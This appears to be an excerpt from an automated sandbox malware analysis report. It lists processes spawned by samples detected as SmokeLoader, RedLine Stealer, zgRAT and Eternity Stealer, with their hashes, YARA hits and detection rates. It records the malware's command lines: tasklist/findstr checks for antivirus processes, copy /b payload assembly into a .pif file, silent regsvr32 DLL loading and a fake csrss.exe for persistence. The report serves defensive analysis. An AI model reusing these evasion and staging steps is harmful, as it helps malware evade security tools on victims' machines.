                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1709555486.000000000080D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:05:28:58
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:05:29:17
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ufhjbuw
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\ufhjbuw
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:308'224 bytes
                                                                                                                                                                    MD5 hash:1B92D73AC6CA807ADC303C424EEEB80B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1987664254.00000000006EC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1984120576.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 46%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:05:29:20
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\35E5.dll
                                                                                                                                                                    Imagebase:0x7ff7595a0000
                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:05:29:20
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline: /s C:\Users\user\AppData\Local\Temp\35E5.dll
                                                                                                                                                                    Imagebase:0x6b0000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:05:29:22
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3BD2.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'278'578 bytes
                                                                                                                                                                    MD5 hash:1B728C6E8F10313D7367C82E48D022DA
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 3%, ReversingLabs
                                                                                                                                                                    • Detection: 3%, Virustotal, Browse
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:05:29:22
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:05:29:23
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /k cmd < Advancement & exit
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:05:29:23
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:05:29:23
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:05:29:24
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\4577.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4577.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'899'520 bytes
                                                                                                                                                                    MD5 hash:AA053CF4ED948FEC79703DEBBB45FBBF
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.2101613794.0000000002735000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 70%, ReversingLabs
                                                                                                                                                                    • Detection: 51%, Virustotal, Browse
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:05:29:27
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                    Imagebase:0xfc0000
                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:05:29:27
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                    Imagebase:0x1a0000
                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:05:29:28
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                    Imagebase:0xfc0000
                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:05:29:28
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:findstr /I "wrsa.exe"
                                                                                                                                                                    Imagebase:0x1a0000
                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:05:29:29
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd /c mkdir 15372
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:05:29:29
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd /c copy /b Zoo + Viewers + Bow + Contractors + Protection + Desk + Kinds 15372\Far.pif
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:05:29:29
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd /c copy /b Payday + Corporate + Spain 15372\i
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:05:29:30
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:15372\Far.pif 15372\i
                                                                                                                                                                    Imagebase:0x7ff73d040000
                                                                                                                                                                    File size:1'071'200 bytes
                                                                                                                                                                    MD5 hash:BFA84DBDE0DF8F1CAD3E179BD46A6E34
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    • Detection: 1%, Virustotal, Browse
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:05:29:30
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:ping -n 5 localhost
                                                                                                                                                                    Imagebase:0x990000
                                                                                                                                                                    File size:18'944 bytes
                                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:23
                                                                                                                                                                    Start time:05:29:38
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:1'071'200 bytes
                                                                                                                                                                    MD5 hash:BFA84DBDE0DF8F1CAD3E179BD46A6E34
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:05:29:39
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\4577.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4577.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'899'520 bytes
                                                                                                                                                                    MD5 hash:AA053CF4ED948FEC79703DEBBB45FBBF
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:05:29:46
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\9D1E.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\9D1E.exe
                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                    File size:5'284'488 bytes
                                                                                                                                                                    MD5 hash:2AA4B3C398F32A8D4403B21769ED1FC1
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\9D1E.exe, Author: Joe Security
                                                                                                                                                                    • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\9D1E.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 27%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:05:29:47
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    Imagebase:0x4b0000
                                                                                                                                                                    File size:42'064 bytes
                                                                                                                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:05:29:48
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:05:29:48
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2736 -ip 2736
                                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:05:29:48
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1160
                                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:05:29:56
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\E35F.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\E35F.exe
                                                                                                                                                                    Imagebase:0xd30000
                                                                                                                                                                    File size:1'671'680 bytes
                                                                                                                                                                    MD5 hash:EAFEB784379E60C2D0BD8D46EAC05286
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: C:\Users\user\AppData\Local\Temp\E35F.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\E35F.exe, Author: Joe Security
                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\E35F.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:05:29:57
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'899'520 bytes
                                                                                                                                                                    MD5 hash:AA053CF4ED948FEC79703DEBBB45FBBF
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.2469988089.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 70%, ReversingLabs
                                                                                                                                                                    • Detection: 51%, Virustotal, Browse
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:05:29:58
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:05:29:59
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\2DF.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\2DF.exe
                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                    File size:419'840 bytes
                                                                                                                                                                    MD5 hash:47FF6687383E2C84A0DDF860E8DB33EB
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:34
                                                                                                                                                                    Start time:05:30:02
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ufhjbuw
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\ufhjbuw
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:308'224 bytes
                                                                                                                                                                    MD5 hash:1B92D73AC6CA807ADC303C424EEEB80B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.2579381005.0000000000730000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.2578412540.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:35
                                                                                                                                                                    Start time:05:30:06
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\5390.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\5390.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:308'736 bytes
                                                                                                                                                                    MD5 hash:0E219D95AC454729366F376B54D9CFB4
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000023.00000002.2438435687.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000023.00000003.2383099821.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.2438711950.000000000063D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
